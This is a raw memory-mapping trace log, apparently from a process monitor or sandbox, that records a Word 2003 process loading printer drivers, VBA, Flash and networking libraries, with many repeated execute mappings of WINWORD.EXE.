C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\prntvpt.dll write and read and execute commit 1F00000 118784 own pid execute success or wait 1
C:\WINDOWS\system32\prntvpt.dll query and write and read and execute image 3FB50000 131072 own pid read write success or wait 1
\BaseNamedObjects\AtlDebugAllocator_FileMappingNameStatic3_488 query and write and read reserve 2430000 4194304 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 1F00000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 1F10000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 1F10000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\BaseNamedObjects\Local\MSO_Formal11108172_S-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\MSO_Formal11108172_S-1-5-21-507921405-1960408961-839522115-500 query and write and read commit 1F10000 8192 own pid read write success or wait 1
\BaseNamedObjects\Local\MSO_AdHoc11108172_S-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\MSO_AdHoc11108172_S-1-5-21-507921405-1960408961-839522115-500 query and write and read commit 1F20000 8192 own pid read write success or wait 1
C:\WINDOWS\system32\msimtf.dll write and read and execute commit 1F70000 159744 own pid execute success or wait 1
\BaseNamedObjects\Global\RotHintTable read unknown 1F70000 4096 own pid readonly success or wait 1
\KnownDlls\msi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msi.dll query and write and read and execute image 7D1E0000 2867200 own pid read write success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL write and read and execute commit 2830000 2588672 own pid execute success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL query and read commit 2830000 2588672 own pid readonly success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL write and read and execute commit 2830000 2588672 own pid execute success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL query and read commit 2830000 2588672 own pid readonly success or wait 1
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\VBE6.DLL write and read and execute commit 2830000 2588672 own pid execute success or wait 1
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\VBE6.DLL query and read commit 2830000 2588672 own pid readonly success or wait 1
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\VBE6.DLL write and read and execute commit 2830000 2588672 own pid execute success or wait 1
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA6\VBE6.DLL query and read commit 2830000 2588672 own pid readonly success or wait 1
\KnownDlls\SXS.DLL write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\sxs.dll query and write and read and execute image 7E720000 720896 own pid read write success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\MSWORD.OLB query and read commit 2830000 659456 own pid readonly success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\1033\VBE6INTL.DLL write and read and execute commit 1FA0000 163840 own pid execute success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\1033\VBE6INTL.DLL query and write and read and execute image 65300000 155648 own pid read write success or wait 1
\BaseNamedObjects\DfSharedHeap38B25 query and write and read reserve 2A30000 4194304 own pid read write success or wait 1
\BaseNamedObjects\DFMap0-232234 query and write and read commit 2E30000 524288 own pid read write success or wait 1
\BaseNamedObjects\DfRoot000038B25 query and write and read commit 1FE0000 4096 own pid read write success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL query and read commit 2F40000 53248 own pid readonly success or wait 1
C:\WINDOWS\system32\stdole2.tlb query and read commit 2F50000 16384 own pid readonly success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL query and read commit 2F60000 57344 own pid readonly success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL query and read commit 2FB0000 266240 own pid readonly success or wait 1
C:\WINDOWS\system32\Macromed\Flash\Flash11f.ocx query and read commit 3000000 40960 own pid readonly success or wait 1
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Word8.0\ShockwaveFlashObjects.exd query and read commit 3010000 20480 own pid readonly success or wait 1
C:\WINDOWS\system32\Macromed\Flash\Flash11f.ocx query and read commit 3000000 40960 own pid readonly success or wait 1
C:\WINDOWS\system32\Macromed\Flash\Flash11f.ocx write and read and execute commit 3020000 8634368 own pid execute success or wait 1
C:\WINDOWS\system32\Macromed\Flash\Flash11f.ocx query and write and read and execute image 10000000 9596928 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1
\KnownDlls\Normaliz.dll write and read and execute unknown 3030000 36864 own pid read write conflicting addresses 1
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1
\KnownDlls\CRYPT32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1
\KnownDlls\MSASN1.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1
\KnownDlls\DSOUND.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\dsound.dll query and write and read and execute image 73F10000 376832 own pid read write success or wait 1
\KnownDlls\COMDLG32.dll write and read and execute unknown 763B0000 299008 own pid read write success or wait 1
\KnownDlls\WS2_32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1
\KnownDlls\WS2HELP.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1
\KnownDlls\d3d9.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\d3d9.dll query and write and read and execute image 4FDD0000 1728512 own pid read write success or wait 1
\KnownDlls\d3d8thk.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\d3d8thk.dll query and write and read and execute image 6D990000 24576 own pid read write success or wait 1
\KnownDlls\mscms.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\mscms.dll query and write and read and execute image 73B30000 86016 own pid read write success or wait 1
\KnownDlls\ieframe.dll write and read and execute unknown 3E1C0000 11096064 own pid read write success or wait 1
C:\WINDOWS\system32\en-us\ieframe.dll.mui query and read commit 35B0000 1241088 own pid write copy success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 36E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 36E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 36E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 36E0000 12312576 own pid execute success or wait 1
\KnownDlls\msapsspc.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msapsspc.dll query and write and read and execute image 71E50000 86016 own pid read write success or wait 1
\KnownDlls\MSVCRT40.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
\KnownDlls\schannel.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\schannel.dll query and write and read and execute image 767F0000 163840 own pid read write success or wait 1
\KnownDlls\NETAPI32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1
\KnownDlls\digest.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\digest.dll query and write and read and execute image 75B00000 86016 own pid read write success or wait 1
\KnownDlls\msnsspc.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msnsspc.dll query and write and read and execute image 747B0000 290816 own pid read write success or wait 1
\KnownDlls\MSVCRT40.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
C:\WINDOWS\system32\schannel.dll write and read and execute commit 36E0000 151552 own pid execute success or wait 1
C:\WINDOWS\system32\schannel.dll query and write and read and execute image 767F0000 163840 own pid read write success or wait 1
\KnownDlls\NETAPI32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE write and read and execute commit 39E0000 12312576 own pid execute success or wait 1
